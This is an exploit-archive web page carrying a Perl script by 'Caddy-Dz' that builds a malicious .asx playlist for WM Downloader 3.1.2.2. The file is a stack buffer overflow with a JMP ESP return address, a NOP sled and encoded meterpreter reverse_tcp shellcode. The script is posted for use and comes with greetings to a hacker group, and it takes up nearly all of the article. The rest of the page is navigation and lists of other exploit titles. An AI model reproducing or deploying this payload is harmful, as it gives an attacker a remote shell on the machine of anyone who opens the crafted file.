首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WM Downloader 3.1.2.2(.asx) Buffer Overflow Exploit
来源:islam_babia[at]hotmail.com 作者:Caddy-Dz 发布时间:2012-04-11  
####
# Exploit Title: WM Downloader 3.1.2.2(.asx) Buffer Overflow Exploit
# Author: Caddy-Dz
# Facebook Page: http://www.facebook.com/ALG.Cyber.Army
# E-mail: islam_babia[at]hotmail.com
# Vendor: http://mini-stream.net/downloads/WMDownloader.exe
# Category:: Local Exploits
# Tested on: VMWare Workstation [Windows Xp Sp 2 / French]
####

# Sp Greets : klashincov3 , KedAns-Dz , Kha&Mix , King Of Pirates , The Algerian Cyber Army Team ... All Algerian Hax0rs
#!/usr/bin/perl
my $file = "Caddy.asx";
my $bof = "http://"."\x41" x 17417;
my $ret = "\x7C\xB4\xE7\x52"; # 7CB4E752   FFE4             JMP ESP
my $nop = "\x42" x 12;

my $shellcode =
# meterpreter/reverse_tcp
# x86/shikata_ga_nai succeeded with size 317 (iteration=1)

"\xbe\xf0\x46\x75\x13\xdd\xc3\xd9\x74\x24\xf4\x5f\x33\xc9\xb1".
"\x49\x31\x77\x14\x03\x77\x14\x83\xef\xfc\x12\xb3\x89\xfb\x5b".
"\x3c\x72\xfc\x3b\xb4\x97\xcd\x69\xa2\xdc\x7c\xbd\xa0\xb1\x8c".
"\x36\xe4\x21\x06\x3a\x21\x45\xaf\xf0\x17\x68\x30\x35\x98\x26".
"\xf2\x54\x64\x35\x27\xb6\x55\xf6\x3a\xb7\x92\xeb\xb5\xe5\x4b".
"\x67\x67\x19\xff\x35\xb4\x18\x2f\x32\x84\x62\x4a\x85\x71\xd8".
"\x55\xd6\x2a\x57\x1d\xce\x41\x3f\xbe\xef\x86\x5c\x82\xa6\xa3".
"\x96\x70\x39\x62\xe7\x79\x0b\x4a\xab\x47\xa3\x47\xb2\x80\x04".
"\xb8\xc1\xfa\x76\x45\xd1\x38\x04\x91\x54\xdd\xae\x52\xce\x05".
"\x4e\xb6\x88\xce\x5c\x73\xdf\x89\x40\x82\x0c\xa2\x7d\x0f\xb3".
"\x65\xf4\x4b\x97\xa1\x5c\x0f\xb6\xf0\x38\xfe\xc7\xe3\xe5\x5f".
"\x6d\x6f\x07\x8b\x17\x32\x40\x78\x25\xcd\x90\x16\x3e\xbe\xa2".
"\xb9\x94\x28\x8f\x32\x32\xae\xf0\x68\x82\x20\x0f\x93\xf2\x69".
"\xd4\xc7\xa2\x01\xfd\x67\x29\xd2\x02\xb2\xfd\x82\xac\x6d\xbd".
"\x72\x0d\xde\x55\x99\x82\x01\x45\xa2\x48\x2a\xef\x58\x1b\x95".
"\x47\x33\x5b\x7d\x95\xb4\x5b\x10\x10\x52\x31\xfc\x74\xcc\xae".
"\x65\xdd\x86\x4f\x69\xc8\xe2\x50\xe1\xfe\x13\x1e\x02\x8b\x07".
"\xf7\xe2\xc6\x7a\x5e\xfc\xfd\x11\x5f\x68\xf9\xb3\x08\x04\x03".
"\xe5\x7f\x8b\xfc\xc0\x0b\x02\x68\xab\x63\x6b\x7c\x2b\x74\x3d".
"\x16\x2b\x1c\x99\x42\x78\x39\xe6\x5f\xec\x92\x73\x5f\x45\x46".
"\xd3\x37\x6b\xb1\x13\x98\x94\x94\xa5\xe5\x42\xd1\x23\x1f\xe1".
"\x31\xe8";

open($File,">$file");
print $File $bof.$ret.$nop.$shellcode;
close($File);
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM Tivoli Provisioning Manage
·CastRipper 2.9.6 (.pls)/(wvx)
·WM Downloader 3.0.0.9 (.pls) B
·Mini-stream RM-MP3 Converter
·Mini-stream RM-MP3 Converter v
·Local buffer overflow (.m3u ,
·Dolibarr ERP & CRM 3 Post-Auth
·Mozilla Firefox Bootstrapped A
·Snort 2 DCE/RPC preprocessor B
·Backtrack 5 R2 wicd Privilege
·wicd Local Privilege Esclation
·Quest InTrust Annotation Objec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved